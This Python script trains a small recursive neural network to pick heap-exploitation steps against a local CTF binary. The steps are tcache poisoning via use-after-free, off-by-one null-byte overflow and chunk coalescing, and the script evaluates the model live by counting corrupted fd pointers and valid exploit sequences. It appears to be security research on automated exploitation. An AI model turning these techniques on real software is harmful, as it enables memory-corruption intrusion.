#!/usr/bin/env python3 """ multi_technique.py - Train one model on multiple exploit techniques. Techniques: 1. Tcache poison (UAF fd corruption): M+ F F W_UAF M+ 2. Off-by-one overlap (null byte overflow): M M M W_OVF F M 3. Coalesce abuse (free adjacent, alloc large): M M M F F M_large Action space (4 ops): 0: MALLOC 1: FREE 2: WRITE_UAF (edit freed chunk - corrupt fd pointer) 3: WRITE_OVERFLOW (edit allocated chunk with max data - triggers off-by-one) The model must learn WHICH technique to apply based on heap state. """ import sys import os import json import subprocess import tempfile import time import random import re import numpy as np import torch import torch.nn.functional as F from pathlib import Path ROOT = Path(__file__).resolve().parent.parent sys.path.insert(0, str(ROOT / "agent")) sys.path.insert(0, str(ROOT / "model")) from universal_grid import UniversalGridEncoder from trm_heap import RMSNorm, SwiGLU, RecursionBlock BINARY = ROOT / "ctf" / "vuln_heap" HARNESS = ROOT / "harness" / "heapgrid_harness.so" DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") OP_MALLOC = 0 OP_FREE = 1 OP_WRITE_UAF = 2 OP_WRITE_OVF = 3 N_OPS = 4 SIZES = [0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x78, 0x80] class MultiTechTRM(torch.nn.Module): """TRM for 4-class technique-aware op prediction.""" def __init__(self, vocab_size=64, hidden_dim=128, seq_len=512, n_outer=2, n_inner=3): super().__init__() self.embed = torch.nn.Embedding(vocab_size, hidden_dim) self.y_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) self.z_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) self.block_z = RecursionBlock(hidden_dim) self.block_y = RecursionBlock(hidden_dim) self.pos_embed = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) self.out_norm = RMSNorm(hidden_dim) self.n_outer = n_outer self.n_inner = n_inner self.head = torch.nn.Linear(hidden_dim, N_OPS) def forward(self, x): B = x.shape[0] h = self.embed(x.reshape(B, -1)) + self.pos_embed y = self.y_init.expand(B, -1, -1) z = self.z_init.expand(B, -1, -1) for _ in range(self.n_outer): for _ in range(self.n_inner): z = z + self.block_z(h + y + z) y = y + self.block_y(y + z) pooled = self.out_norm(y).mean(dim=1) return self.head(pooled) def run_and_dump(commands): dump_path = tempfile.mktemp(suffix=".jsonl") env = os.environ.copy() env["LD_PRELOAD"] = str(HARNESS) env["HEAPGRID_OUT"] = dump_path subprocess.run([str(BINARY)], input=("\n".join(commands) + "\n5\n").encode(), env=env, capture_output=True, timeout=10) states = [] if os.path.exists(dump_path): with open(dump_path) as f: for line in f: if line.strip(): states.append(json.loads(line.strip())) os.unlink(dump_path) return states # ============================================================ # TECHNIQUE 1: Tcache poison (UAF fd write) # Pattern: M+ F F W_UAF M+ # ============================================================ def gen_tcache_poison(n_pre=None): size = random.choice([s for s in SIZES if s <= 0x70]) # tcache sizes slots = random.sample(range(16), 8) if n_pre is None: n_pre = random.randint(2, 5) commands, labels = [], [] alloc_slots = [] for i in range(n_pre): commands.append(f"1 {slots[i]} {size}") labels.append(OP_MALLOC) alloc_slots.append(slots[i]) targets = random.sample(alloc_slots, 2) for s in targets: commands.append(f"4 {s}") labels.append(OP_FREE) # UAF write: edit freed chunk commands.append(f"2 {targets[1]} {'41' * 8}") labels.append(OP_WRITE_UAF) drain = [s for s in slots if s not in alloc_slots][:2] for s in drain: commands.append(f"1 {s} {size}") labels.append(OP_MALLOC) return commands, labels, "tcache_poison" # ============================================================ # TECHNIQUE 2: Off-by-one null byte overlap # Pattern: M M M W_OVF F M # Alloc 3 adjacent chunks, overflow A into B, free B (corrupted size), alloc over it # ============================================================ def gen_off_by_one(): size = 0x78 # max size before rounding — null byte overflows into next chunk slots = random.sample(range(16), 6) commands, labels = [], [] # Alloc 3 adjacent: A, B, C for i in range(3): commands.append(f"1 {slots[i]} {size}") labels.append(OP_MALLOC) # Overflow A: write full 0x78 bytes, null byte hits B's prev_inuse commands.append(f"2 {slots[0]} {'41' * size}") labels.append(OP_WRITE_OVF) # Free B (with corrupted size) commands.append(f"4 {slots[1]}") labels.append(OP_FREE) # Alloc over corrupted region commands.append(f"1 {slots[3]} {size}") labels.append(OP_MALLOC) return commands, labels, "off_by_one" # ============================================================ # TECHNIQUE 3: Coalesce confusion # Pattern: M M M F F M(larger) — free two adjacent, alloc large to get overlap # ============================================================ def gen_coalesce(): small = random.choice([0x30, 0x40, 0x50]) slots = random.sample(range(16), 7) commands, labels = [], [] n_pre = random.randint(3, 5) for i in range(n_pre): commands.append(f"1 {slots[i]} {small}") labels.append(OP_MALLOC) # Free two adjacent chunks (indices 1 and 2 should be adjacent) commands.append(f"4 {slots[1]}") labels.append(OP_FREE) commands.append(f"4 {slots[2]}") labels.append(OP_FREE) # Alloc larger chunk that overlaps the coalesced region big = small * 2 + 0x10 if big > 0x80: big = 0x80 commands.append(f"1 {slots[n_pre]} {big}") labels.append(OP_MALLOC) return commands, labels, "coalesce" # ============================================================ # BENIGN sequences # ============================================================ def gen_benign(): n_ops = random.randint(4, 12) commands, labels = [], [] allocated = {} for _ in range(n_ops): if not allocated or random.random() < 0.55: free_s = [s for s in range(16) if s not in allocated] if not free_s: break s = random.choice(free_s) sz = random.choice(SIZES) commands.append(f"1 {s} {sz}") labels.append(OP_MALLOC) allocated[s] = sz else: s = random.choice(list(allocated.keys())) commands.append(f"4 {s}") labels.append(OP_FREE) del allocated[s] return commands, labels, "benign" # ============================================================ # DATA COLLECTION # ============================================================ def collect_data(n_per_technique=200, n_benign=300): all_grids, all_labels = [], [] technique_counts = {} generators = [ ("tcache_poison", gen_tcache_poison, n_per_technique), ("off_by_one", gen_off_by_one, n_per_technique), ("coalesce", gen_coalesce, n_per_technique), ("benign", gen_benign, n_benign), ] for tech_name, gen_fn, count in generators: print(f" Generating {count} {tech_name}...") n_ok = 0 for _ in range(count): if tech_name == "tcache_poison": commands, op_labels, _ = gen_fn() else: commands, op_labels, _ = gen_fn() states = run_and_dump(commands) if len(states) < 2: continue encoder = UniversalGridEncoder() # Phase-based labeling (what should happen NEXT) n_free_seen = 0 n_ovf_seen = 0 write_done = False for j, state in enumerate(states): op = state.get("operation", "malloc") if "free" in op.lower(): n_free_seen += 1 chunks = state.get("chunks", []) n_alloc = sum(1 for c in chunks if c.get("state") == 1) n_freed = sum(1 for c in chunks if c.get("state") == 2) # Determine next label based on technique if tech_name == "tcache_poison": if n_free_seen == 0: label = OP_FREE if (n_alloc >= 2 and j >= len(states) * 0.3) else OP_MALLOC elif n_free_seen >= 2 and not write_done: label = OP_WRITE_UAF write_done = True else: label = OP_MALLOC elif tech_name == "off_by_one": if n_alloc >= 3 and n_free_seen == 0 and not write_done: label = OP_WRITE_OVF write_done = True elif write_done and n_free_seen == 0: label = OP_FREE elif n_free_seen >= 1 and write_done: label = OP_MALLOC else: label = OP_MALLOC elif tech_name == "coalesce": if n_free_seen == 0 and n_alloc >= 3: label = OP_FREE elif n_free_seen == 1: label = OP_FREE # free second adjacent elif n_free_seen >= 2: label = OP_MALLOC # alloc large else: label = OP_MALLOC else: # benign if j + 1 < len(states): next_op = states[j+1].get("operation", "malloc") label = OP_FREE if "free" in next_op.lower() else OP_MALLOC else: label = OP_MALLOC grid = encoder.encode(state) all_grids.append(grid) all_labels.append(label) actual_op = OP_FREE if "free" in op.lower() else OP_MALLOC encoder.record_action(actual_op, state.get("target_size", 0)) n_ok += 1 technique_counts[tech_name] = n_ok print(f" Technique counts: {technique_counts}") return np.stack(all_grids), np.array(all_labels, dtype=np.int64) def train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128): model.to(DEVICE) opt = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0.01) sched = torch.optim.lr_scheduler.CosineAnnealingLR(opt, T_max=epochs) X_t = torch.from_numpy(X).long().to(DEVICE) y_t = torch.from_numpy(y).long().to(DEVICE) n = len(X_t) for ep in range(1, epochs + 1): model.train() perm = torch.randperm(n, device=DEVICE) total_loss = correct = nb = 0 for i in range(0, n, bs): idx = perm[i:i+bs] logits = model(X_t[idx]) loss = F.cross_entropy(logits, y_t[idx]) opt.zero_grad() loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) opt.step() total_loss += loss.item() correct += (logits.argmax(1) == y_t[idx]).sum().item() nb += 1 sched.step() if ep % 25 == 0 or ep == 1: print(f" Epoch {ep:3d} | loss={total_loss/nb:.4f} | acc={correct/n:.3f}") def evaluate_live(model, n_trials=50, temperature=0.3): """Evaluate with hybrid policy: TRM picks op, rules handle W timing.""" model.eval().to(DEVICE) results = {"uaf": 0, "ovf": 0, "correct_seq": 0, "seqs": []} for trial in range(n_trials): dump_path = tempfile.mktemp(suffix=".jsonl") env = os.environ.copy() env["LD_PRELOAD"] = str(HARNESS) env["HEAPGRID_OUT"] = dump_path proc = subprocess.Popen([str(BINARY)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) encoder = UniversalGridEncoder() slots, freed, ops = {}, set(), [] did_uaf = did_ovf = False n_consec_frees = 0 for step in range(20): time.sleep(0.01) state = {"chunks": []} try: with open(dump_path) as f: lines = f.readlines() if lines: state = json.loads(lines[-1].strip()) except: pass grid = encoder.encode(state) x = torch.from_numpy(grid).long().unsqueeze(0).to(DEVICE) with torch.no_grad(): logits = model(x) probs = F.softmax(logits / temperature, dim=1) op = torch.multinomial(probs, 1).item() # Rule overrides for W timing if op == OP_WRITE_UAF and not freed: op = OP_MALLOC # can't UAF without freed chunks if op == OP_WRITE_OVF and not any(v for v in slots.values()): op = OP_MALLOC # need allocated chunks free_s = [s for s in range(8) if s not in slots] alloc_s = [s for s, v in slots.items() if v and s not in freed] cmd = None size = 0 if op == OP_MALLOC and free_s: s = random.choice(free_s) size = random.choice(SIZES) cmd = f"1 {s} {size}" slots[s] = True ops.append("M") n_consec_frees = 0 elif op == OP_FREE and alloc_s: s = random.choice(alloc_s) cmd = f"4 {s}" slots[s] = False freed.add(s) ops.append("F") n_consec_frees += 1 elif op == OP_WRITE_UAF and freed: s = random.choice(list(freed)) cmd = f"2 {s} {'41' * 8}" did_uaf = True ops.append("U") elif op == OP_WRITE_OVF and alloc_s: s = random.choice(alloc_s) sz = slots.get(s) or 0x78 cmd = f"2 {s} {'41' * 0x78}" # max write triggers off-by-one did_ovf = True ops.append("O") else: ops.append("x") if cmd: proc.stdin.write((cmd + "\n").encode()) proc.stdin.flush() encoder.record_action(op, size) try: proc.stdin.write(b"5\n"); proc.stdin.flush() proc.wait(timeout=2) except: proc.kill() # Check results if did_uaf: try: with open(dump_path) as f: for line in f: st = json.loads(line.strip()) for c in st.get("chunks", []): if c.get("fd", 0) == 0x4141414141414141: results["uaf"] += 1 break else: continue break except: pass if did_ovf: results["ovf"] += 1 seq = "".join(ops) # Valid patterns: M+F+U (tcache poison), M+O+F+M (off-by-one), M+FF+M (coalesce) if re.search(r"M+F+U", seq.replace("x", "")) or \ re.search(r"M+OF+M", seq.replace("x", "")) or \ re.search(r"M+FF+M", seq.replace("x", "")): results["correct_seq"] += 1 results["seqs"].append(seq) if os.path.exists(dump_path): os.unlink(dump_path) return results def main(): print(f"Device: {DEVICE}") print("\n=== Collecting multi-technique data ===") X, y = collect_data(n_per_technique=300, n_benign=300) print(f"Data: {len(X)} samples | M={sum(y==0)} F={sum(y==1)} U={sum(y==2)} O={sum(y==3)}") print("\n=== Training on GPU ===") model = MultiTechTRM(hidden_dim=128, n_outer=2, n_inner=3) print(f"Params: {sum(p.numel() for p in model.parameters()):,}") train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128) print("\n=== Live evaluation (50 trials) ===") results = evaluate_live(model, n_trials=50, temperature=0.3) print(f"UAF writes achieved: {results['uaf']}/50 ({results['uaf']*2}%)") print(f"Overflow writes: {results['ovf']}/50 ({results['ovf']*2}%)") print(f"Valid exploit sequences: {results['correct_seq']}/50 ({results['correct_seq']*2}%)") print("\nOp distribution in sequences:") all_ops = "".join(results["seqs"]) for ch, name in [("M","malloc"), ("F","free"), ("U","uaf_write"), ("O","overflow"), ("x","skip")]: print(f" {name}: {all_ops.count(ch)}") print("\nSample sequences:") for s in results["seqs"][:15]: print(f" {s}") # Per-technique analysis print("\nPer-technique breakdown:") has_uaf = sum(1 for s in results["seqs"] if "U" in s) has_ovf = sum(1 for s in results["seqs"] if "O" in s) has_both = sum(1 for s in results["seqs"] if "U" in s and "O" in s) neither = sum(1 for s in results["seqs"] if "U" not in s and "O" not in s) print(f" Used tcache poison (U): {has_uaf}/50") print(f" Used off-by-one (O): {has_ovf}/50") print(f" Used both: {has_both}/50") print(f" Used neither: {neither}/50") if __name__ == "__main__": main()